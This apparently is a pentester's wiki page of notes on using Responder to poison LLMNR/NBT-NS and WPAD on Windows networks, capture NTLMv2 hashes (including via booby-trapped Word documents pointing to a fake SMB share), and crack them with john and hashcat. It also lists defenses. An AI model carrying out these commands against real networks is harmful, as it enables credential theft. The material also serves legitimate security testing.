Focused on attacks on NTLM Auth Name Resolution Windows can get Lonely Ask neighbors for that name and Authentication Setup and wait for somebody to hit. Maybe we'll get hit by Vulnerability Scanner (w/creds) Feed Word docs w/remote picture/icon to fake-smb-share Setup 'wpad' proxy plugin, and maybe catch 'auto-proxy' Defense: Disable NBT-NS and LLMNR SMB Signing Disable Autodetect Proxy Private VLANS to isolate clients execute: > sudo Responder.py -I eth0 Poisoners: LLMNR, NBT, DNS Servers: HTTP, HTTPS, Kerberos, etc Windows Target: \\tacocat Announce request, and Captures the pw-hashes !!! bob..1234 hashes: cd /opt/responder/logs cat SMBv2.IP.xxx.txt john --format=netntlmv2 /opt/responder/logs/SMBv2.IP.xxx.txt hashcat -m 5600 hash.txt pwlist.txt -o cracked.txt

Responder

Focused on attacks on NTLM Auth Name Resolution
Windows can get Lonely
Ask neighbors for that name
and Authentication

Setup and wait for somebody to hit.
Maybe we'll get hit by Vulnerability Scanner (w/creds)
Feed Word docs w/remote picture/icon to fake-smb-share
Setup 'wpad' proxy plugin, and maybe catch 'auto-proxy'

Defense:
Disable NBT-NS and LLMNR
SMB Signing
Disable Autodetect Proxy
Private VLANS to isolate clients

execute: 
> sudo Responder.py -I eth0
Poisoners: LLMNR, NBT, DNS
Servers: HTTP, HTTPS, Kerberos, etc

Windows Target: 
\\tacocat
Announce request, and Captures the pw-hashes !!!
bob..1234

hashes:
cd /opt/responder/logs
cat SMBv2.IP.xxx.txt
john --format=netntlmv2 /opt/responder/logs/SMBv2.IP.xxx.txt
hashcat -m 5600 hash.txt pwlist.txt -o cracked.txt

Hot Potato - is another method:

PreviousPowershell NextSaved Creds runas

Last updated 2 years ago

Was this helpful?